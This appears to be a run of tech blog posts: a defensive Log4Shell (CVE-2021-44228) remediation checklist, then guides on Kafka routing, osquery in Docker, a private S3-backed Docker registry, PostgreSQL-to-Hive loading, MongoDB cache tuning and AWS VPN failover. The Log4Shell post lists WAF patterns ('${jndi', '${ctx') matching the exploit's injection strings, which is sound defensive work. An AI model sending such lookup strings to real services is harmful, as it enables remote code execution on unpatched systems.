log4j2 CVE-2021-44228 – Log4Shell

What is it?

  • One of the most severe security vulnerability in recent times
  • Only impacts Java application which are using a very popular logging library (many)
  • Application does not need to be Internet facing. If user provided input makes its way to the application and is processed by the logging library, it may be vulnerable
  • A well crafted string sent as a part of HTTP header(s) or the HTTP body, if it reaches the logging library can make the application vulnerable

What is vulnerable and which version has the fix?

  • log4j (1.x) is a legacy library. Even though it has its own vulnerabilities, none as severe as this
  • log4j-core jar file from log4j2 library has the vulnerable class
  • log4j-core-2.0-beta7.jar or later versions are vulnerable
  • log4j-core-2.3.2.jar (for JDK6), log4j-core-2.12.4.jar (for JDK7) and log4j-core-2.17.1.jar (for JDK8 and later) have the fix

What does a compromised application do?

  • Pretty much anything is possible
  • Exfiltrate secrets and other sensitive data
  • Move laterally to other parts of the infrastructure
  • Ransomware/spyware/… attacks
  • Exploit does not necessarily create additional processes
  • Initial exploit instructions may be downloaded from the Internet by the vulnerable Java application

What inventory should I gather?

  • Dev, staging, test, production, … machines
  • Cloud VMs, containers
  • Serverless
  • Artifactory and other internal registries/caches
  • Container registries
  • Blob stores with build artifacts
  • Employee machines

What information am I gathering?

  • Vendor software with Java
  • Looking for vulnerable Java applications
  • Looking for all log4j version 1 and 2 artifacts

How am I fixing this?

  • Leave log4j 1.x alone? Upgrade? What about third-party software with no option to upgrade to the latest log4j2? (lower priority)
  • Upgrade to 2.12.2 (JDK 7) or 2.16.0 (JDK 8 and above)
  • Add Environment variable (LOG4J_FORMAT_MSG_NO_LOOKUPS=true) or JVM property (-Dlog4j2.formatMsgNoLookups=true)? These did not fix the vulnerability:

  • Delete class file? Where is this done? Post build or pre deployment? Post build is ideal

What do I look for?

  • Java processes
  • Containers with Java processes
  • JDK/JRE version
  • jar/ear/war/jmod files. Unfortunately java -jar can run any arbitrary file with any extension. Lets hope you don’t have any of those 🙂
  • Do I have uber jars, shaded jars, jmod, …
  • Do I have compressed jars?
  • Are the jars obfuscated?

I removed JndiLookup.class. How do I validate?

  • For each Java process, if jps is available:
for i in `jps | grep -v Jps | awk ‘{print $1}’`; do jcmd $i GC.class_histogram | grep -q JndiLookup && { echo “PID $i MIGHT be vulnerable”; }; done
  • Basically make sure the class is not loaded by your application

I upgraded to a fixed version. How do I validate?

  • Get inventory of all jar/war/war/jmod files opened by the process
  • For each file opened by the process, check if it is or contains vulnerable log4j2-core jar
  • Validate on on-going basis to avoid deploying vulnerable applications due to auto scaling, old build artifacts etc.

Build process?

  • Scan container images for vulnerable version
  • Scan Java artifacts for vulnerable version

What can my other teams do?

  • If you have a Web Application Firewall (WAF), use it. Make sure you apply the following rules:

${.*${ or ${jndi or ${ctx strings matching HTTP headers or body payload

  • If you have EDR/XDR product, for non-patched assets/Java processes:
    • Monitor processes spawned by Java processes
    • Monitor egress traffic to Internet (if the process is not expected to reach out to Internet)
  • Now is the time to look at egress firewall/security group rules. If your Java processes are in a subnet that the process is not expected to reach out to Internet, add egress blocking

What else?

  • Apply download blocking and remove vulnerable versions from artifactory etc.
  • Delete container images that are vulnerable to prevent accidental deployment
  • Delete build artifacts that are vulnerable
  • Make sure employees are not able to push to container registries and internal build artifact repository
  • Clean maven/gradle caches from employee machines. In case there are privileged users who can update container registries or build artifacts from their machines

log4j2 CVE-2021-44228 – Log4Shell

Kafka producer routing

If you are using Kafka and AWS you probably have something like the following in one of the AWS regions. Multiple availability zones (AZs). One or more Kafka brokers in each AZ. Probably multiple producers sending data to one or more topics in each AZ.


This is AWS/Cloud best practice for high availability and scalability. For each topic replication factor should be more than one and should have decent number of partitions (greater than or equal to maximum number of consumers)

Depending on the partition selection logic in producers, messages from 1a might be routed to broker in 1b which might replicate the message to 1c broker.  There are multiple options for how to select a partition in the producer:

  • Use a hard coded partition number 😦
  • Randomly pick one of the partition
  • Cycle through the partitions
  • Based on some message key, generate a hash code and pick a partition based on number of partitions and hash code
  • Or some other custom logic

Different client libraries have different out of the box options for partition selection.  What happens if your producers are high volume and pumping terabytes of data! There are two issues with high volume deployments:

  • Network throughput across AZs might not be as high as with-in AZ
  • There is a cost associated with cross AZ data transfer. I think it is $10 per TB

There are couple of options to work around this. A while back support for Rack aware replica assignment was added to Kafka To take advantage of rack awareness a new property called broker.rack was introduced. In case of AWS this should be set to the AZ name. Eg: us-east-1c. This information is also made available in metadata API response. Using this information producer partition selection can do the following:


Producers in each AZ can select partitions belonging to the brokers in same AZ. Broker rack information and topic partition leaders can be retrieved using metadata request. Producers can narrow down the partition list based on their AZ. With-in the filtered list of partitions, producer can apply one of the partition selection algorithms noted above. For example if there are 120 partitions, ideally brokers in each AZ will be leader for 40 partitions. Producers in AZ will pick one of the 40 partitions and route messages to the partition leader in same AZ.

When replication factor is greater than one, messages will still cross AZ boundary. But it will be less data crossing the AZ when compared to non-rack aware partition selection.

I patched fork of kafka-node library with rack-aware routing logic. It is a combination of rack based filtering + message key hashcode based partition selection.

Kafka producer routing

Docker and osquery

If you are into security you might have heard about osquery. It is extremely powerful tool that can be used for various purposes:

  • Real time endpoint monitoring
  • Anomaly detection
  • File integrity monitoring
  • Metrics (prometheus)
  • Container (docker) monitoring
  • syslog aggregation

Numerous enterprises big and small from all verticals are using it, or planning on using it. It is being deployed to production servers as well as employee desktop/laptops. It has first class support for various flavors of Linux and macOS. Windows functionality is maturing, thanks to open source community contributions and Facebook’s efforts.

Recently we (Uptycs) started publishing docker images with latest osquery version. We published images for various versions of Ubuntu and CentOS. Ideally running osquery in docker container doesn’t make sense unless you are using CoreOS Container Linux. But if you are just playing with osquery and want to test some functionality docker images are ideal. osquery comes with two binaries. Interactive shell osqueryi and osqueryd daemon.

Interactive shell can be launched as follows. It will present a SQL prompt:

$ docker run -it uptycs/osquery:2.7.0 osqueri
Using a virtual database. Need help, type '.help'

You can run sample queries like:

osquery> SELECT * FROM processes;

When running inside the container osquery will only return information available to it from within the container. In the case of processes which are retrieved from /proc osquery will return the processes running inside the container. In this case it will be one process: /usr/bin/osqueryi

If you omit the command part it will launch the osquery daemon with a warning:

$ docker run -it uptycs/osquery:2.7.0
W0919 19:46:14.058230 7 init.cpp:649] Error reading config: config file does not exist: /etc/osquery/osquery.conf

This is because the Dockerfile is configured to run the osquery daemon by default with the following arguments:

osqueryd --flagfile /etc/osquery/osquery.flags --config_path /etc/osquery/osquery.conf

Flags file and the config file are meant to be provided from the host. osquery have extensive number of command line flags. Optionally configuration file can also be provided to the container. Refer to osquery configuration documentation on what can be specified in conf file.

Assuming osquery.flags and osquery.conf are created on host machine in directory /some/path, osquery daemon can be launched as:

$ docker run -it -v /some/path:/etc/osquery uptycs/osquery:2.7.0

osquery can also gather information about docker . When osquery is running inside container, it cannot talk to the docker daemon running on the host machine. If you expose the document UNIX domain socket from host to the container osquery can query/gather information about docker images, containers, volumes, networks, labels etc

$ docker run -it -v /some/path:/etc/osquery -v/var/run/docker.sock:/var/run/docker.sock uptycs/osquery:2.7.0

If logging is configured, osquery daemon needs to identify itself to the log endpoint.
–host_identifier flag should be appropriately configured. If hostname value is used for host identifier, you might want to start docker with hostname option:

$ docker run -it --hostname osquery1.example.com -v /some/path:/etc/osquery -v/var/run/docker.sock:/var/run/docker.sock uptycs/osquery:2.7.0

host_identifier with uuid value is not appropriate if you are planning on launching multiple osquery docker instances or if you have osquery running on the host also. Docker containers will end up sharing the same UUID.

As I mentioned above osquery in docker only makes sense for playing with osquery or testing it. In real deployments it should be running on the host or virtual machine. In case of CoreOS Container Linux there is no easy way to run any service on the host/virtual machine. On Container Linux osquery can be run inside toolbox which uses systemd-nspawn.  I will cover this in separate topic.

Docker and osquery

Private docker registry on AWS with S3

Creating a docker private registry is pretty trivial and well documented. If you are just playing with it, docker hub might be a good start. Few things to figure out before starting with private registry:

  • Storage. There are numerous options
    • File system
    • Azure
    • Google cloud (GCS)
    • AWS S3
    • Swift
    • OSS
    • In memory (not a good option unless you are testing)
  • Authentication
    • silly (as the name implies it is really silly and not suitable for real deployments)
    • htpasswd (Apache htpasswd style authentication). Credentials are predefined in a file and only suitable when used with TLS)
    • token OAUTH 2.0 style authentication using a Bearer token. This could be tricky, if you have Jenkins or other CI systems building and pushing docker images)
  • Transport security
    • Use of TLS is a strongly advised. If you don’t have X509 cert/key, use letsencrypt free service
  • Storage security
    • Ideally image data should also be secured at rest. See below for S3 storage security
  • Regions
    • If accessing data from multiple regions is required, docker registry provides ability to use CloudFront

Here is a quick and easy setup on AWS using S3 as storage:

  • Create S3 bucket in the region you want to save the images (my-docker-registry)
  • If you got burned by recent AWS S3 outage few months back, you would also replicate your bucket to another region 🙂 It is pretty simple to setup
  • I also recommend using encrypting data in S3 bucket. You can do this using AWS Key Management Service (KMS) or using Server Side Encryption (SSE) with AES-256. If you are replicating the bucket data to other region(s), you cannot use KMS
  • For the buckets, set bucket policy (under bucket permissions) to enforce encrypted data. Here is sample bucket policy for enforcing SSE AES-256:
    "Version": "2012-10-17",
    "Id": "PutObjPolicy",
    "Statement": [
            "Sid": "DenyIncorrectEncryptionHeader",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::my-docker-registry/*",
            "Condition": {
                "StringNotEquals": {
                    "s3:x-amz-server-side-encryption": "AES256"
            "Sid": "DenyUnEncryptedObjectUploads",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::my-docker-registry/*",
            "Condition": {
                "Null": {
                    "s3:x-amz-server-side-encryption": "true"
  • Figure out where you are going to run the registry. Docker registry is a docker image. It is better to have this EC2 instance in the same region as the S3 bucket. Ideally it should be in a VPC with a S3 endpoint configured. Whether the instance should have Public IP or not depends on where you are going to push/pull the images from!
  • Ideally the instance hosting docker registry can be launched with IAM role. This way there won’t be a need to provision access/secret keys. Here is a sample IAM role:
    "Version": "2012-10-17",
    "Statement": [
            "Effect": "Allow",
            "Action": [
            "Resource": "arn:aws:s3:::my-docker-registry"
            "Effect": "Allow",
            "Action": [
            "Resource": "arn:aws:s3:::my-docker-docker/*"
  • Configure the Security Group the the instance appropriately. Ideally I would disable all incoming ports except for 22 and 443 from your specific IP address
  • Follow the installation instructions to install latest docker on the instance
  • The user who is going to bring up the docker registry container should have access to talk to docker daemon. You can either do this as root user 😦 or modify a regular user and make the user part of docker group (usermod -a -G docker userid)
  • Create a docker-compose.yml file. Here is sample. In this case I used X509 cert/key issued by a CA
  restart: always
  image: registry:2
   - 443:5000
   - /host/path/to/certs:/certs
   - /host/path/to/config.yml:/etc/docker/registry/config.yml
  • Create /host/path/to/config.yml configuration for registry configuration. Here is sample template with S3 storage and TLS configuration:
version: 0.1
    region: us-east-1
    bucket: my-docker-registry
    encrypt: true
    secure: true
    v4auth: true
    chunksize: 5242880
    multipartcopychunksize: 33554432
    multipartcopymaxconcurrency: 100
    multipartcopythresholdsize: 33554432
    blobdescriptor: inmemory
  net: tcp
  prefix: /
  host: https://<registry hostname>
    certificate: /certs/hostname.crt
    key: /certs/hostname.key
    X-Content-Type-Options: [nosniff]
   disabled: false
  • Change <registry hostname> with appropriate value. In this case, I used real X509 certificate and key that are copied to the host and made available to the docker registry image. Other option is to use letsencrypt configuration
  • Bring up the docker registry:
$ docker-compose up -d
# Check logs
$ docker-compose logs registry
  • Now it should be possible to tag and push any image to your registry. For example:
$ docker pull ubuntu
$ docker tag ubuntu <registry hostname>/ubuntu

At this point registry should be working and usable but because authentication is not yet setup, you should make sure it is only accessible from trusted hosts.

Private docker registry on AWS with S3

PosgreSQL to Hadoop/Hive

Ever tried to get data from PostgreSQL to Hive? Came across CSV SerDe which is bundled in latest version of Apache Hive. But for all practical purposes it is useless. It treats every column as string. So wrote my own SerDe. You can find the source on GitHub. Dump your PostgreSQL table data using pg_dump or psql with COPY in plain text format.

Download pgdump-serde jar to your local machine. Open hive shell, add jar. Create external table and load the dump data. If you are using pg_dump file, this SerDe cannot handle schema, comments, column headers etc. So remove unnecessary header/footer that is not row data.

hive> add jar <path to>/pgdump-serde-1.0.4-1.2.0-all.jar;
hive> USE my_database;
hive> CREATE EXTERNAL TABLE `my_table_ext` (
  `id` string,
  `time` timestamp,
  `what` boolean,
  `size` int,
ROW FORMAT SERDE 'com.pasam.hive.serde.pg.PgDumpSerDe'
LOCATION '/tmp/my_table_ext.txt';
hive> LOAD DATA LOCAL INPATH '<path to dump directory>/my_table.dump' OVERWRITE INTO TABLE my_table_ext;
PosgreSQL to Hadoop/Hive

MongoDB WiredTiger slow queries

Recently we hit production MongoDB (version 3.2.6) issue. MongoDB was reporting lots slow queries. Our application was starting to show performance issues. Some of the slow responses were for covered queries.

mongostat was reporting very high %used for WiredTiger cache and it was not coming down. As a result we were seeing significantly high value for  db.serverStatus().wiredTiger.cache[“pages evicted by application threads”]. This was causing slowdown of many queries. Ideally this value should be zero. This will happen if the cache % used hits 96%. Ideally it should be around 80%

Currently experimenting with WiredTiger eviction parameters to see if it makes any difference:

  • eviction_trigger
  • eviction_target
  • eviction_dirty_target
  • eviction=(threads_min=X,threads_max=Y)

It looks like the eviction server is not able to keep up with evicting pages and it gets into a state where application threads are evicting pages causing slowdown  😦


We had thousands of collections in this database and 10’s of thousands of indices. Most of the collections were collection shards to work-around MMAPv1 collection lock contention. Before we sharded the collections one of them grew very big. 10’s of millions of entries. In this scenarios, depending on applications CRUD pattern, you can hit cache related issues. There are two solutions that worked for me with WiredTiger. Either to evenly balance the sharded collection or to consolidate the sharded collections.

MongoDB WiredTiger slow queries

AWS VPN High Availability

This is a refinement to my previous approach.  In previous model, there were two VyOS instances in every AWS region. In this model, there are only two VyOS instances in the hub region. All Amazon regions (including the hub region) connect to these VyOS instances. Each line below represents two tunnels. Amazon VPN comes with two tunnels. But both tunnels connect to the same server (VyOS) on the other end.


Total cost comes down to (2 * $0.05 per hour * number of regions) + (2 * instance type for VyOS). In our deployment, I chose c3.2xlarge which is $0.42 per hour. For reserved instances that prices comes down to $.020+ cents per instances. For a total of four regions the cost per hour is (2 * 0.05 * 4) + (2 * 0.42) = $1.24 per hour (on demand instances). For 1 year reserved, the cost comes down to roughly $0.90 cents per hour. c3.2xlarge is probably bigger than what we need, but it has high network throughput.

Figure out your hub AWS region. Launch two VyOS AMI’s in two different availability zones

  • These should be in public subnet with public IP addresses
  • Enable termination protection if you want to be on the safe side
  • Change shutdown behavior to stop the instance (instead of terminate)
  • Disable source/destination checks (important)
  • Use a open security group until the configuration is done

Allocate two Elastic IPs (EIP) and associate them with the two instances

Upgrade VyOS to the latest version (accept the default values for all the prompts). Reboot after it done

$ add system image http://packages.vyos.net/iso/release/version/vyos-version-amd64.iso
$ reboot

In every region (including the hub), create two customer gateways (CGW), one for each VyOS instance

  • Use dynamic routing
  • Use a BGP ASN from private space (eg: 65000). Use the same value for all CGWs
  • Use the Elastic IP address of VyOS

Also in every region, create Virtual Private Gateway (VPG) and attach it to the VPC. And finally create two VPN connections (one for each CGW)

  • VPG should match the one created before
  • Routing should be dynamic

Once the VPNs are created, download the configuration for each one of them

  • Vendor: Vyatta
  • Platform: Vyatta Network OS
  • Software:Vyatta Network OS 6.5+

There is a lot common in all of these configuration files. Depending on the number of regions, you might end up with 2, 4, 6 or 8 configuration files. Separate the files into two groups. Ones that are associated with CGW1 and others for CGW2

$ ssh -i private-key vyos@elastic-ip-of-cgw
$ configure
set vpn ipsec ike-group AWS lifetime ‘28800'
set vpn ipsec ike-group AWS proposal 1 dh-group ‘2'
set vpn ipsec ike-group AWS proposal 1 encryption ‘aes128'
set vpn ipsec ike-group AWS proposal 1 hash ‘sha1'
set vpn ipsec ipsec-interfaces interface ‘eth0'
set vpn ipsec esp-group AWS compression ‘disable’
set vpn ipsec esp-group AWS lifetime ‘3600'
set vpn ipsec esp-group AWS mode ‘tunnel’
set vpn ipsec esp-group AWS pfs ‘enable’
set vpn ipsec esp-group AWS proposal 1 encryption ‘aes128'
set vpn ipsec esp-group AWS proposal 1 hash ‘sha1'
set vpn ipsec ike-group AWS dead-peer-detection action ‘restart’
set vpn ipsec ike-group AWS dead-peer-detection interval ‘15'
set vpn ipsec ike-group AWS dead-peer-detection timeout ‘45'

Next configure the interfaces. All VPN configurations refer to vti0 and vti1. But you cannot use the same VTI’s for multiple tunnels. So replace vti0/vti1 with vtiX/vtiY appropriately. Example:

set interfaces vti vti3 address ‘169.A.B.C/30'
set interfaces vti vti3 description ‘Oregon to Virginia Tunnel 1'
set interfaces vti vti3 mtu ‘1436'

set interfaces vti vti4 address ‘169.X.Y.Z/30'
set interfaces vti vti4 description ‘Oregon to Virginia Tunnel 2'
set interfaces vti vti4 mtu ‘1436'

In the site-to-site section of the downloaded configuration files, local-address will be set to the elastic IP address of VyOS. VyOS will not like that, because it does not know anything about the EIP. Change it to the local eth0 address (eg: And apply the site-to-site configuration:

set vpn ipsec site-to-site peer X.Y.Z.A authentication mode ‘pre-shared-secret’
set vpn ipsec site-to-site peer X.Y.Z.A authentication pre-shared-secret ‘XX1'
set vpn ipsec site-to-site peer X.Y.Z.A description ‘Oregon to Virginia Tunnel 1'
set vpn ipsec site-to-site peer X.Y.Z.A ike-group ‘AWS’
set vpn ipsec site-to-site peer X.Y.Z.A local-address ‘10.A.B.C'
set vpn ipsec site-to-site peer X.Y.Z.A vti bind ‘vtiX'
set vpn ipsec site-to-site peer X.Y.Z.A vti esp-group ‘AWS’

Next configure BGP:

set protocols bgp 650xy neighbor 169.A.B.E remote-as ‘xyz1'
set protocols bgp 650xy neighbor 169.A.B.E soft-reconfiguration ‘inbound’
set protocols bgp 650xy neighbor 169.A.B.E timers holdtime ‘30'
set protocols bgp 650xy neighbor 169.A.B.E timers keepalive ‘30'

In my setup, I also changed the ntp servers and the hostname:

set system host-name my-hostname
delete system ntp
set system ntp server 0.a.b.ntp.org
set system ntp server 1.a.b.ntp.org
set system ntp server 2.a.b.ntp.org

Amazon instances only get a route for their subnet and not the entire VPC. If you check the output of show ip route, you will see a route for the VyOS subnet. Add a static route for the entire VPC. The follow example assumes you have a 10.X.0.0/16 VPC:

set protocols static route 10.X.0.0/16 next-hop 10.X.0.1 distance 10

Finally, configure the route/network BGP will advertise to the other end (Amazon). For BGP to advertise the route, the route should be in the routing table.

set protocols static route next-hop 10.Y.0.1 distance 100
set protocols bgp 650xy network

Commit the changes and backup the configuration. And keep a copy of the configuration somewhere safe (not on the VyOS instances).

save /home/vyos/backup.conf

From the backed up configuration file, it is better to remove sections that are specific to the VyOS instance. This way, the configuration can be merged easily when instances need to be replaced later:

  • interfaces ethernet eth0
  • service
  • system

You can refer to VyOS documentation Wiki, but some commands I found useful:

show ip route
show ip bgp
show ip bgp summary
show ip bgp neighbor 169.A.B.E advertised-routes
show ip bgp neighbor 169.A.B.E received-routes
show vpn debug

At this point, all VPN tunnels in all VPC’s should be green. And they should be receiving exactly 1 route. Modify all the VPC route tables and enable route propagation. All instances should be able to reach other instances irrespective of which VPC they are in.

If it is necessary to replace a VyOS instance:

  • Kill the instance that is being replaced
  • Create another instance in the same public subnet with the same private IP
  • Choose the correct security group and SSH key
  • Disable the source/dest checks
  • Reassign the EIP from the old instance
  • SCP the backup configuration file to the new VyOS instance
  • SSH to the instance:
$ configure
$ delete system ntp
$ commit
$ merge /home/vyos/backup.conf
$ commit
$ save
$ exit

There are 4 tunnels from each VPC to the hub. If one VyOS box dies, traffic will start flowing through the other one. Start ping from an instance in VPC1 to another instance in VPC2. While this is running, reboot VyOS1 instance. You should see minimal disruption. Once the VyOS1 box comes up, reboot VyOS2, traffic should fail over appropriately.

Finally modify the security group/NACLs. NTP uses 123/udp (inbound and outbound). IPsec uses 500/udp and ESP/AH IP protocols (inbound and outbound). BGP uses 179/tcp. And of course you want SSH (22/tcp) open as well. You can modify the security group/NACLs by port/protocol. Another option is to whitelist the Amazon VPN tunnel IP address and let all traffic from those IPs.

AWS VPN High Availability